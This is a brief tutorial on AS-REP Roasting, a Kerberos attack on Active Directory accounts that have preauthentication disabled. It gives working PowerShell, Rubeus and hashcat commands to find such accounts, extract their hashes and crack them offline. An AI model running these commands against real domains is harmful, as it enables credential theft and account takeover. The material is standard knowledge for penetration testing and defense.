AS-REPRoasting

AS-REP Roasting targets Active Directory accounts with the "Do not require Kerberos preauthentication" flag enabled. When preauthentication is disabled, the domain controller returns an AS-REP message encrypted with the user's password hash. Attackers capture this message and then perform offline brute-force or dictionary attacks to recover the plaintext password.

MITRE ATT&CK ID: T1558.004

1- Understanding the Attack

Attack Vector:

Targets AD accounts configured to bypass Kerberos preauthentication.
Mechanism:

Without preauthentication, the domain controller issues an AS-REP containing data encrypted with the user's password hash. This data can be captured and cracked offline, revealing the account’s plaintext password.

2- Steps of an AS-REP Roasting Attack

a. Identify Vulnerable Accounts

Objective:

Find accounts with the "Do not require Kerberos preauthentication" flag enabled.

Example Command (PowerShell):

Get-ADUser -Filter * -Properties DoesNotRequirePreAuth |
    Where-Object { $_.DoesNotRequirePreAuth -eq $True -and $_.Enabled -eq $True } |
    Select-Object SamAccountName, DoesNotRequirePreAuth

Example Output:

SamAccountName         DoesNotRequirePreAuth
--------------         ----------------------
ESMERALDA_MIRANDA      True
jdoe                   True

b. Extract AS-REP Hashes

Process:

Use Rubeus to capture AS-REP messages from vulnerable accounts.

Example Command:

Rubeus.exe asreproast /format:hashcat /outfile:C:\\Temp\\hashes.txt

Example Outcome (hashes.txt):

[email protected]:b4d9969983602fa94d7fe07f55a2a0a2$...

c. Offline Password Cracking

Objective:

Crack the captured AS-REP hash to reveal the plaintext password.

Example Command Using Hashcat:

hashcat64.exe -m 18200 C:\\Temp\\hashes.txt dictionary.dict